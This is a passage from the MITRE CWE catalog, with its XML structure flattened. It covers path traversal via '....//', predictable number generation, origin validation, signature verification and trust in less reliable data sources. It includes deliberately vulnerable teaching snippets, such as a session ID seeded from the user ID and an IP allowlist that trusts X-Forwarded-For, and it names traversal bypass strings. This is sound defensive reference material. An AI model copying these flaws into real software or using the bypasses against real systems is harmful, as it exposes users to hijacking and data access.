- updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Potential_Mitigations, References - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes - - - CWE Content Team - MITRE - 2021-07-20 - updated Demonstrative_Examples, Description, Maintenance_Notes, Observed_Examples, Potential_Mitigations, References - - - - - The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '....//' (doubled dot dot slash) sequences that can resolve to a location that is outside of that directory. - - This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory. - The '....//' manipulation is useful for bypassing some path traversal protection schemes. If "../" is filtered in a sequential fashion, as done by some regular expression engines, then "....//" can collapse into the "../" unsafe value (CWE-182). It could also be useful when ".." is removed, if the operating system treats "//" and "/" as equivalent. - - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Source code Weakness Analyzer - Context-configured Source Code Weakness Analyzer - - - - - SOAR Partial - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - Formal Methods / Correct-By-Construction - - - - - High - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. - Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. - - High - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2004-1670 - Mail server allows remote attackers to create arbitrary directories via a ".." or rename arbitrary files via a "....//" in user supplied parameters. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1670 - - - - - '....//' (doubled dot dot slash) - - - SFP16 - Path Traversal - - - - This could occur due to a cleansing error that removes a single "../" from "....//" - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Relationship_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Description, Potential_Mitigations - - - CWE Content Team - MITRE - 2010-12-13 - updated Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2021-03-15 - updated Potential_Mitigations - - Path Issue - Doubled Dot Dot Slash - '....//' - - - - The product uses a scheme that generates numbers or identifiers that are more predictable than required. - - - - - - Architecture and Design - - - Implementation - - - - - Other - Varies by Context - - - - - Predictability problems - - - 11 - Brute Force - - - - - - - As of CWE 4.5, terminology related to randomness, entropy, and - predictability can vary widely. Within the developer and other - communities, "randomness" is used heavily. However, within - cryptography, "entropy" is distinct, typically implied as a - measurement. There are no commonly-used definitions, even within - standards documents and cryptography papers. Future versions of - CWE will attempt to define these terms and, if necessary, - distinguish between them in ways that are appropriate for - different communities but do not reduce the usability of CWE for - mapping, understanding, or other scenarios. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-02-16 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Maintenance_Notes - - Predictability Problems - - - - A number or object is predictable based on observations that the attacker can make about the state of the system or network, such as time, process ID, etc. - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Other - Varies by Context - This weakness could be exploited by an attacker in a number ways depending on the context. If a predictable number is used to generate IDs or keys that are used within protection mechanisms, then an attacker could gain unauthorized access to the system. If predictable filenames are used for storing sensitive information, then an attacker might gain access to the system and may be able to gain access to the information in the file. - - - - - Implementation - Increase the entropy used to seed a PRNG. - - - Architecture and Design - Requirements - Libraries or Frameworks - Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems. Consult FIPS 140-2 Annex C ("Approved Random Number Generators"). - - - Implementation - Use a PRNG that periodically re-seeds itself using input from high-quality sources, such as hardware devices with high entropy. However, do not re-seed too frequently, or else the entropy source might block. - - - - - This code generates a unique random identifier for a user's session. - - function generateSessionID($userID){srand($userID);return rand();} - - Because the seed for the PRNG is always the user's ID, the session ID will always be the same. An attacker could thus predict any user's session ID and potentially hijack the session. - This example also exhibits a Small Seed Space (CWE-339). - - - - - CVE-2002-0389 - Mail server stores private mail messages with predictable filenames in a world-executable directory, which allows local users to read private mailing list archives. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0389 - - - CVE-2001-1141 - PRNG allows attackers to use the output of small PRNG requests to determine the internal state information, which could be used by attackers to predict future pseudo-random numbers. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1141 - - - CVE-2000-0335 - DNS resolver library uses predictable IDs, which allows a local attacker to spoof DNS query results. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0335 - - - CVE-2005-1636 - MFV. predictable filename and insecure permissions allows file modification to execute SQL queries. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1636 - - - - - Predictable from Observable State - - - - - - - - As of CWE 4.5, terminology related to randomness, entropy, and - predictability can vary widely. Within the developer and other - communities, "randomness" is used heavily. However, within - cryptography, "entropy" is distinct, typically implied as a - measurement. There are no commonly-used definitions, even within - standards documents and cryptography papers. Future versions of - CWE will attempt to define these terms and, if necessary, - distinguish between them in ways that are appropriate for - different communities but do not reduce the usability of CWE for - mapping, understanding, or other scenarios. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2009-12-28 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Potential_Mitigations, References - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Maintenance_Notes - - - - - An exact value or random number can be precisely predicted by observing previous values. - - - - - - - - - Architecture and Design - - - Implementation - - - - - Other - Varies by Context - - - - - Increase the entropy used to seed a PRNG. - - - Architecture and Design - Requirements - Libraries or Frameworks - Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems. Consult FIPS 140-2 Annex C ("Approved Random Number Generators"). - - - Implementation - Use a PRNG that periodically re-seeds itself using input from high-quality sources, such as hardware devices with high entropy. However, do not re-seed too frequently, or else the entropy source might block. - - - - - CVE-2002-1463 - Firewall generates easily predictable initial sequence numbers (ISN), which allows remote attackers to spoof connections. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1463 - - - CVE-1999-0074 - Listening TCP ports are sequentially allocated, allowing spoofing attacks. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0074 - - - CVE-1999-0077 - Predictable TCP sequence numbers allow spoofing. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0077 - - - CVE-2000-0335 - DNS resolver uses predictable IDs, allowing a local user to spoof DNS query results. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0335 - - - - - Predictable Exact Value from Previous Values - - - - - - - - As of CWE 4.5, terminology related to randomness, entropy, and - predictability can vary widely. Within the developer and other - communities, "randomness" is used heavily. However, within - cryptography, "entropy" is distinct, typically implied as a - measurement. There are no commonly-used definitions, even within - standards documents and cryptography papers. Future versions of - CWE will attempt to define these terms and, if necessary, - distinguish between them in ways that are appropriate for - different communities but do not reduce the usability of CWE for - mapping, understanding, or other scenarios. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2009-12-28 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Potential_Mitigations, References - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, References - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Maintenance_Notes - - - - - The software's random number generator produces a series of values which, when observed, can be used to infer a relatively small range of possibilities for the next value that could be generated. - The output of a random number generator should not be predictable based on observations of previous values. In some cases, an attacker cannot predict the exact value that will be produced next, but can narrow down the possibilities significantly. This reduces the amount of effort to perform a brute force attack. For example, suppose the product generates random numbers between 1 and 100, but it always produces a larger value until it reaches 100. If the generator produces an 80, then the attacker knows that the next value will be somewhere between 81 and 100. Instead of 100 possibilities, the attacker only needs to consider 20. - - - - - - - - - Architecture and Design - - - Implementation - - - - - Other - Varies by Context - - - - - Increase the entropy used to seed a PRNG. - - - Architecture and Design - Requirements - Libraries or Frameworks - Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems. Consult FIPS 140-2 Annex C ("Approved Random Number Generators"). - - - Implementation - Use a PRNG that periodically re-seeds itself using input from high-quality sources, such as hardware devices with high entropy. However, do not re-seed too frequently, or else the entropy source might block. - - - - - Predictable Value Range from Previous Values - - - - - - - - - As of CWE 4.5, terminology related to randomness, entropy, and - predictability can vary widely. Within the developer and other - communities, "randomness" is used heavily. However, within - cryptography, "entropy" is distinct, typically implied as a - measurement. There are no commonly-used definitions, even within - standards documents and cryptography papers. Future versions of - CWE will attempt to define these terms and, if necessary, - distinguish between them in ways that are appropriate for - different communities but do not reduce the usability of CWE for - mapping, understanding, or other scenarios. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-03-10 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2009-12-28 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Potential_Mitigations, References - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, References - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Maintenance_Notes - - - - - The product uses a constant value, name, or reference, but this value can (or should) vary across different environments. - - - - - - Primary - - - Resultant - - - - - - - - Architecture and Design - - - Implementation - - - - - Other - Varies by Context - - - - - CVE-2002-0980 - Component for web browser writes an error message to a known location, which can then be referenced by attackers to process HTML/script in a less restrictive context - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0980 - - - - - Static Value in Unpredictable Context - - - - - - - overlaps default configuration. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Relationship_Notes, Relevant_Properties, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-03-10 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2009-12-28 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-02-16 - updated Relationships - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-12-13 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Potential_Mitigations, References - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Other_Notes - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, References, Relevant_Properties - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Static Value in Unpredictable Context - - - - The software does not sufficiently verify the origin or authenticity of data, in a way that causes it to accept invalid data. - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Integrity - Other - Varies by Context - Unexpected State - - - - - Insufficient Verification of Data - - - A3 - Broken Authentication and Session Management - CWE More Specific - - - 12 - Content Spoofing - - - - - - - - - - - - - - - - - - - - "origin validation" could fall under this. - The specific ways in which the origin is not properly identified should be laid out as separate weaknesses. In some sense, this is more like a category. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Maintenance_Notes, Relationships, Relationship_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2009-07-27 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-02-16 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-12-13 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Related_Attack_Patterns - - Insufficient Verification of Data - - - - The software does not properly verify that the source of data or communication is valid. - - - - - - - - Primary - - - Resultant - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Access Control - Other - Gain Privileges or Assume Identity - Varies by Context - An attacker can access any functionality that is inadvertently accessible to the source. - - - - - This Android application will remove a user account when it receives an intent to do so: - - IntentFilter filter = new IntentFilter("com.example.RemoveUser");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter); - public class DeleteReceiver extends BroadcastReceiver {@Overridepublic void onReceive(Context context, Intent intent) {int userID = intent.getIntExtra("userID");destroyUserData(userID);}} - - This application does not check the origin of the intent, thus allowing any malicious application to remove a user. Always check the origin of an intent, or create an allowlist of trusted applications using the manifest.xml file. - - - These Android and iOS applications intercept URL loading within a WebView and perform special actions if a particular URL scheme is used, thus allowing the Javascript within the WebView to communicate with the application: - - - // Android - @Overridepublic boolean shouldOverrideUrlLoading(WebView view, String url){ - if (url.substring(0,14).equalsIgnoreCase("examplescheme:")){if(url.substring(14,25).equalsIgnoreCase("getUserInfo")){writeDataToView(view, UserData);return false;}else{return true;}} - } - - - - // iOS - -(BOOL) webView:(UIWebView *)exWebView shouldStartLoadWithRequest:(NSURLRequest *)exRequest navigationType:(UIWebViewNavigationType)exNavigationType{ - NSURL *URL = [exRequest URL];if ([[URL scheme] isEqualToString:@"exampleScheme"]){ - NSString *functionString = [URL resourceSpecifier];if ([functionString hasPrefix:@"specialFunction"]){ - - - // Make data available back in webview. - UIWebView *webView = [self writeDataToView:[URL query]]; - }return NO; - }return YES; - } - - A call into native code can then be initiated by passing parameters within the URL: - - window.location = examplescheme://method?parameter=value - - Because the application does not check the source, a malicious website loaded within this WebView has the same access to the API as a trusted site. - - - - - CVE-2000-1218 - DNS server can accept DNS updates from hosts that it did not query, leading to cache poisoning - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1218 - - - CVE-2005-0877 - DNS server can accept DNS updates from hosts that it did not query, leading to cache poisoning - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0877 - - - CVE-2001-1452 - DNS server caches glue records received from non-delegated name servers - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1452 - - - CVE-2005-2188 - user ID obtained from untrusted source (URL) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2188 - - - CVE-2003-0174 - LDAP service does not verify if a particular attribute was set by the LDAP server - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0174 - - - CVE-1999-1549 - product does not sufficiently distinguish external HTML from internal, potentially dangerous HTML, allowing bypass using special strings in the page title. Overlaps special elements. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1549 - - - CVE-2003-0981 - product records the reverse DNS name of a visitor in the logs, allowing spoofing and resultant XSS. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0981 - - - - - Origin Validation Error - - - - - - - - - - - - - - - - - - - - - - - - - This entry has some significant overlap with other CWE entries and may need some clarification. See terminology notes. - The "Origin Validation Error" term was originally used in a 1995 thesis [REF-324]. Although not formally defined, an issue is considered to be an origin validation error if either (1) "an object [accepts] input from an unauthorized subject," or (2) "the system [fails] to properly or completely authenticate a subject." A later section says that an origin validation error can occur when the system (1) "does not properly authenticate a user or process" or (2) "does not properly authenticate the shared data or libraries." The only example provided in the thesis (covered by OSVDB:57615) involves a setuid program running command-line arguments without dropping privileges. So, this definition (and its examples in the thesis) effectively cover other weaknesses such as CWE-287 (Improper Authentication), CWE-285 (Improper Authorization), and CWE-250 (Execution with Unnecessary Privileges). There appears to be little usage of this term today, except in the SecurityFocus vulnerability database, where the term is used for a variety of issues, including web-browser problems that allow violation of the Same Origin Policy and improper validation of the source of an incoming message. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-05-27 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-12-13 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2014-02-18 - updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Maintenance_Notes, References, Relationship_Notes, Relationships, Terminology_Notes - - - CWE Content Team - MITRE - 2014-06-23 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Demonstrative_Examples, Terminology_Notes - - - - - The software does not verify, or incorrectly verifies, the cryptographic signature for data. - - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Access Control - Integrity - Confidentiality - Gain Privileges or Assume Identity - Modify Application Data - Execute Unauthorized Code or Commands - An attacker could gain access to sensitive data and possibly execute unauthorized code. - - - - - In the following code, a JarFile object is created from a downloaded file. - - File f = new File(downloadedFilePath);JarFile jf = new JarFile(f); - - The JAR file that was potentially downloaded from an untrusted source is created without verifying the signature (if present). An alternate constructor that accepts a boolean verify parameter should be used instead. - - - - - CVE-2002-1796 - Does not properly verify signatures for "trusted" entities. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1796 - - - CVE-2005-2181 - Insufficient verification allows spoofing. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2181 - - - CVE-2005-2182 - Insufficient verification allows spoofing. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2182 - - - CVE-2002-1706 - Accepts a configuration file without a Message Integrity Check (MIC) signature. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1706 - - - - - Improperly Verified Signature - - - SEC06-J - Do not rely on the default automatic signature verification provided by URLClassLoader and java.util.jar - - - - - - - - - PLOVER - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Related_Attack_Patterns, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Related_Attack_Patterns - - Improperly Verified Signature - - - - The software has two different sources of the same data or information, but it uses the source that has less support for verification, is less trusted, or is less resistant to attack. - - - - - - - - - Architecture and Design - - - Implementation - - - - - Access Control - Bypass Protection Mechanism - Gain Privileges or Assume Identity - An attacker could utilize the untrusted data source to bypass protection mechanisms and gain access to sensitive data. - - - - - This code attempts to limit the access of a page to certain IP Addresses. It checks the 'HTTP_X_FORWARDED_FOR' header in case an authorized user is sending the request through a proxy. - - $requestingIP = '0.0.0.0';if (array_key_exists('HTTP_X_FORWARDED_FOR', $_SERVER)) {$requestingIP = $_SERVER['HTTP_X_FORWARDED_FOR']; - else{$requestingIP = $_SERVER['REMOTE_ADDR'];} - if(in_array($requestingIP,$ipAllowlist)){generatePage();return;}else{echo "You are not authorized to view this page";return;} - - The 'HTTP_X_FORWARDED_FOR' header can be user controlled and so should never be trusted. An attacker can falsify the header to gain access to the page. - This fixed code only trusts the 'REMOTE_ADDR' header and so avoids the issue: - - $requestingIP = '0.0.0.0';if (array_key_exists('HTTP_X_FORWARDED_FOR', $_SERVER)) {echo "This application cannot be accessed through a proxy.";return; - else{$requestingIP = $_SERVER['REMOTE_ADDR'];} - ... - - - - Be aware that 'REMOTE_ADDR' can still be spoofed. This may seem useless because the server will send the response to the fake address and not the attacker, but this may still be enough to conduct an attack. For example, if the generatePage() function in this code is resource intensive, an attacker could flood the server with fake requests using an authorized IP and consume significant resources. This could be a serious DoS attack even though the attacker would never see the page's sensitive content. - - - - - CVE-2001-0860 - Product uses IP address provided by a client, instead of obtaining it from the packet headers, allowing easier spoofing. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0860 - - - CVE-2004-1950 - Web product uses the IP address in the X-Forwarded-For HTTP header instead of a server variable that uses the connecting IP address, allowing filter bypass. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1950 - - - BID:15326 - Similar to CVE-2004-1950 - http://www.securityfocus.com/bid/15326/info - - - CVE-2001-0908 - Product logs IP address specified by the client instead of obtaining it from the packet headers, allowing information hiding. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0908 - - - CVE-2006-1126 - PHP application uses IP address from X-Forwarded-For HTTP header, instead of REMOTE_ADDR. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1126 - - - - - Use of Less Trusted Source - - - - - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, Observed_Examples, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Demonstrative_Examples - - - - - The software, when processing trusted data, accepts any untrusted data that is also included with the trusted data, treating the untrusted data as if it were trusted. - - - - - - - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - Implementation - - - - - Access Control - Integrity - Bypass Protection Mechanism - Modify Application Data - An attacker could package untrusted data with trusted data to bypass protection mechanisms to gain access to and possibly modify sensitive data. - - - - - CVE-2002-0018 - Does not verify that trusted entity is authoritative for all entities in its response. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0018 - - - CVE-2006-5462 - use of extra data in a signature allows certificate signature forging - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5462 - - - - - Untrusted Data Appended with Trusted Data - - - ENV01-J - Place all security-sensitive code in a single JAR and sign and seal it - - - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Related_Attack_Patterns, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 